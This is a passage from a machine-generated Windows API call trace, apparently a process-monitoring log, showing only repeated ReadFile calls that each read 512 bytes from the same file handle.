lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.249] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.250] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.250] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.250] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.250] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.250] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.250] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.250] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.250] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.250] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.250] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.250] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.250] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.251] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.251] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.251] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.251] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.251] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.251] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.251] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.251] ReadFile (in: hFile=0x58, 
lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.251] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.251] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.251] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.252] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.252] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.252] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.252] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.252] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.252] ReadFile 
(in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.252] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.252] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.252] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.252] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.252] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.252] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.253] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.253] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 
[0236.253] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.253] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.253] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.253] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.253] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.253] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.253] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.253] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.253] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, 
lpOverlapped=0x0) returned 1 [0236.254] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.254] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.254] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.254] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.254] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.254] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.254] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.254] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.254] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, 
lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.254] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.254] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.254] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.255] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.255] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.255] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.255] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.255] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.255] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: 
lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.255] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.255] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.255] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.255] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.255] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.256] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.256] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.256] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.256] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, 
lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.256] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.256] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.256] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.256] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.256] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.256] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.256] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.257] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.257] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.257] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.257] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.257] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.257] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.257] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.257] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.257] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.257] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.257] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.257] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.258] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.258] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.258] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.258] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.258] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.258] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, 